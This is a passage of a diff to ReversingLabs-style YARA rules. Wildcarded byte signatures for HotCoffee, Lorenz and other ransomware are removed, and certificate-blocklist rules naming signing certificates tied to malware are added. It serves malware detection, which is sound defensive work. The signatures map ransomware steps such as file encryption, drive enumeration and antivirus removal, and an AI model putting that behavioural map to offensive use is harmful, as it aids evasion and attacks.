?? 6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? - ?? 51 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? - ?? 8B 88 ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 8B 82 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 8B - 91 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 - ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? - ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? - 68 ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 - ?? 68 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? - 74 ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? - ?? ?? 52 FF 15 - } - $encrypt_files_p2 = { - 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 50 8D - 4D ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 FF - 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8D 95 ?? - ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 - ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 6A ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? - ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 6A ?? - 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? - ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A - ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 6A ?? 8B - 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 85 D2 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D - ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 6A ?? 6A ?? E8 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 - 68 ?? ?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 6A ?? 6A ?? E8 ?? ?? - ?? ?? 50 8B 15 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B - E5 5D C2 - } - $encrypt_files_p3 = { - 55 8B EC 83 EC ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B - 4D ?? 51 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 - ?? FF 15 ?? ?? ?? ?? 33 C0 EB ?? 8B 4D ?? 51 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 - ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8D 4D ?? - 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? - ?? ?? ?? 33 C0 EB ?? 8B 4D ?? 8B 55 ?? 89 11 33 C0 8B E5 5D C3 - } - $find_files = { - 8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 - 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? - 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD - ?? ?? ?? ?? ?? 75 ?? EB ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 - C0 76 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ?? 68 - ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? - 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? - ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? - 51 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? - ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 - } - $uninstall_eset_av = { - 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 86 ?? ?? ?? ?? 8D 4D ?? 51 68 ?? ?? ?? ?? 8D - 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? - ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 8D ?? - ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? - ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? - ?? ?? 6A ?? 6A ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? - FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A - ?? 6A ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? E9 ?? - ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($uninstall_eset_av) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "1105 SOFTWARE LLC" and pe.signatures[i].serial=="5c:9f:5f:96:72:6a:6e:6f:c3:b8:bb:15:3a:c8:2a:f2" and 1679061408<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Hotcoffee : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6E889Bb3B7F7194B674C6A0335A608E0 : INFO FILE { meta: - description = "Yara rule that detects HotCoffee ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "11b26b91-96ae-58d3-8a8a-02a3e7d0b82e" - date = "2021-11-25" - modified = "2021-11-25" + id = "d164846d-9552-5108-8b01-1b4b3e7c0b60" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.HotCoffee.yara#L1-L111" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "15ae428c37fcc5a09d324fd9be5a8df3a812e6459cb1ce8eec56eabf785b4c05" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12388-L12404" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fa2a47f4fb822089fcc958850ce516c8c5d95a6d9b575f3b1d1d4a2ceb2537e4" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "HotCoffee" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 48 0F 44 C6 BA ?? ?? ?? ?? 48 2B D0 - 48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48 03 C2 4C 8D 0D ?? ?? ?? - ?? 4C 2B C9 0F 1F 44 00 ?? 48 85 C0 74 ?? 45 0F B7 04 09 66 45 85 C0 74 ?? 66 44 89 - 01 48 83 C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1 66 89 30 - 48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 95 ?? ?? ?? ?? 48 8D 44 24 ?? - 48 89 44 24 ?? 41 B8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? BA ?? - ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B 4C 24 ?? 48 3B - C8 74 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 66 39 30 74 ?? 48 83 - C0 ?? 48 83 E9 ?? 75 ?? 48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 48 0F 44 C6 - BA ?? ?? ?? ?? 48 2B D0 48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48 - 03 C2 4C 8D 0D ?? ?? ?? ?? 4C 2B C9 48 85 C0 74 ?? 45 0F B7 04 09 66 45 85 C0 74 ?? - 66 44 89 01 48 83 C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1 - 66 89 30 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 89 - 44 24 ?? 48 83 F8 ?? 75 ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 8D - ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 - 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 - } - $encrypt_files_p1 = { - B9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 90 66 83 38 ?? 74 ?? 48 83 C0 ?? 48 83 E9 ?? 75 - ?? 48 85 C9 74 ?? 41 B8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 4C 2B C1 BA ?? ?? ?? ?? 48 - 85 C9 4C 0F 44 C3 4A 8D 04 40 49 2B D0 74 ?? 49 8D 88 ?? ?? ?? ?? 48 03 CA 4C 8D 0D - ?? ?? ?? ?? 4C 2B C8 66 90 48 85 C9 74 ?? 45 0F B7 04 01 66 45 85 C0 74 ?? 66 44 89 - 00 48 FF C9 48 83 C0 ?? 48 83 EA ?? 75 ?? 48 85 D2 48 8D 48 ?? 48 0F 45 C8 66 89 19 - 48 89 5C 24 ?? 45 33 C9 C7 44 24 ?? ?? ?? ?? ?? 44 8B C7 8B D7 C7 44 24 ?? ?? ?? ?? - ?? 49 8B CC FF 15 ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D - 8D ?? ?? ?? ?? 44 8B C7 C7 44 24 ?? ?? ?? ?? ?? 48 8B F0 41 8D 51 ?? FF 15 ?? ?? ?? - ?? 41 B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 33 D2 48 8D 0D ?? - ?? ?? ?? 4C 8B F0 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 41 B9 ?? - ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 45 - } - $encrypt_files_p2 = { - 33 C0 BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B - 15 ?? ?? ?? ?? 45 33 C9 48 8B 8D ?? ?? ?? ?? 44 8B C0 FF 15 ?? ?? ?? ?? 4C 8B 85 ?? - ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 44 8B CF BA ?? ?? ?? ?? 48 89 44 - 24 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 32 DB 41 BD ?? ?? ?? ?? 48 - 8B F8 66 66 66 0F 1F 84 00 ?? ?? 00 00 4C 8D 8D ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? - ?? 41 B8 ?? ?? ?? ?? 48 8B D7 48 8B CE FF 15 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? - ?? 48 8D 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? - 0F B6 DB 41 0F 42 DD 48 89 7C 24 ?? 44 0F B6 C3 45 33 C9 33 D2 FF 15 ?? ?? ?? ?? 44 - 8B 85 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 8B D7 48 C7 44 24 ?? ?? ?? ?? ?? 49 8B CE - FF 15 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 4C 8B 6C 24 ?? 48 85 F6 74 ?? 48 8B CE FF - 15 ?? ?? ?? ?? 4D 85 F6 - } - $drop_ransom_note = { - 48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 49 0F 44 C6 BA ?? ?? ?? ?? 48 2B D0 - 48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48 03 C2 4C 8D 0D ?? ?? ?? - ?? 4C 2B C9 66 90 48 85 C0 74 ?? 46 0F B7 04 09 66 45 85 C0 74 ?? 66 44 89 01 48 83 - C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1 66 44 89 30 4C 89 - 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? - ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 49 C7 C0 ?? ?? ?? ?? 49 FF C0 - 46 38 34 06 75 ?? 4C 89 74 24 ?? 4C 8D 8D ?? ?? ?? ?? 48 8B D6 48 8B CB FF 15 ?? ?? - ?? ?? 48 85 DB 74 ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE E8 ?? ?? ?? ?? 90 48 8B 95 - ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 - ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 33 F6 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 40 88 75 ?? 48 - 8B 95 ?? ?? ?? ?? 48 83 FA ?? 0F 82 ?? ?? ?? ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 8D ?? - ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 48 83 C2 ?? 48 8B 49 ?? 48 - 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 86 ?? ?? ?? ?? FF 15 - } - $enum_drives = { - 48 89 5D ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 8B F8 0F A3 DF 0F - 83 ?? ?? ?? ?? 8D 4B ?? 48 C7 45 ?? ?? ?? ?? ?? 88 4D ?? 48 C7 45 ?? ?? ?? ?? ?? 66 - C7 45 ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 3B 05 ?? ?? ?? ?? 74 ?? 48 8D 55 ?? 48 8B C8 - E8 ?? ?? ?? ?? 48 83 05 ?? ?? ?? ?? ?? EB ?? 4C 8D 45 ?? 48 8B D0 48 8D 0D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 90 48 8B 45 ?? 48 83 F8 ?? 72 ?? 48 8D 50 ?? 48 8B 4D ?? 48 8B C1 - 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? - 77 ?? E8 ?? ?? ?? ?? FF C3 83 FB ?? 0F 8C ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? - E8 ?? ?? ?? ?? 90 33 C0 48 8B 4D ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 5C 24 ?? 49 8B 5B - ?? 49 8B 7B ?? 49 8B E3 5D C3 FF 15 - } - condition: - uint16(0)==0x5A4D and ($enum_drives) and ($find_files) and ( all of ($encrypt_files_p*)) and ($drop_ransom_note) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CLEVERCONTROL LLC" and pe.signatures[i].serial=="6e:88:9b:b3:b7:f7:19:4b:67:4c:6a:03:35:a6:08:e0" and 1646956800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Lorenz : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0F62F760704Bdf8Dc30C7Baa7376F484 : INFO FILE { meta: - description = "Yara rule that detects Lorenz ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "cc97dd15-d518-5d9f-9384-3dcf81e34e81" - date = "2022-10-24" - modified = "2022-10-24" + id = "fe326fb9-fe1e-5fc9-8599-6b4cfd6506dd" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Lorenz.yara#L1-L252" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b8668fcc560d264c37e3fbb52d5a5f1223a282abd9e984b3109efe9ab454be9f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12406-L12422" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d54d52e116b9404782ce80664f218d2e142577dac672c53c41b82f0466c7375a" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Lorenz" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_v1_p1 = { - BE ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? A5 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? - ?? ?? A5 A5 A4 8B 35 ?? ?? ?? ?? FF D6 89 85 ?? ?? ?? ?? 33 C0 50 68 ?? ?? ?? ?? 6A - ?? 50 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 85 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 75 - ?? FF D6 8B 3D ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF D7 EB ?? 8B 3D ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 - C0 75 ?? FF D6 6A ?? FF B5 ?? ?? ?? ?? FF D7 6A ?? 6A ?? 53 FF B5 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? 85 C0 75 ?? FF D6 8D 85 ?? ?? ?? ?? 33 DB 50 53 FF B5 ?? ?? ?? ?? 68 ?? - ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D6 53 FF B5 ?? ?? ?? ?? - FF D7 6A ?? 8D 45 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? - ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 53 8B 9D ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B - 0D ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 89 4D ?? 66 8B 0D ?? ?? ?? ?? 66 89 4D ?? 8D 4D - ?? 89 85 ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 6A ?? 50 2B CA 8D 45 ?? 51 50 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68 - ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 33 C0 50 50 - } - $encrypt_files_v1_p2 = { - 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 D2 42 3B C2 75 ?? 83 BD ?? ?? ?? ?? ?? - 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? 33 D2 42 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 03 8D - ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 89 8D ?? ?? ?? ?? 0F 44 C2 8D - 8D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 51 8D 4D ?? 51 6A ?? 50 6A ?? FF B5 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 85 C0 74 ?? 83 A5 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF B5 ?? - ?? ?? ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 6A ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? - 85 C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF D7 FF B5 ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 8B 85 ?? ?? ?? - ?? 50 FF D6 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F - 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 - } - $find_files_v1_p1 = { - FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 0F 57 C0 C6 45 - ?? ?? 6A ?? 6A ?? 0F 11 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 - C0 74 ?? 89 18 89 58 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 08 8B 3D ?? ?? ?? ?? - 8B B5 ?? ?? ?? ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F - 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF - D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 - C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D - } - $find_files_v1_p2 = { - 8B 95 ?? ?? ?? ?? 68 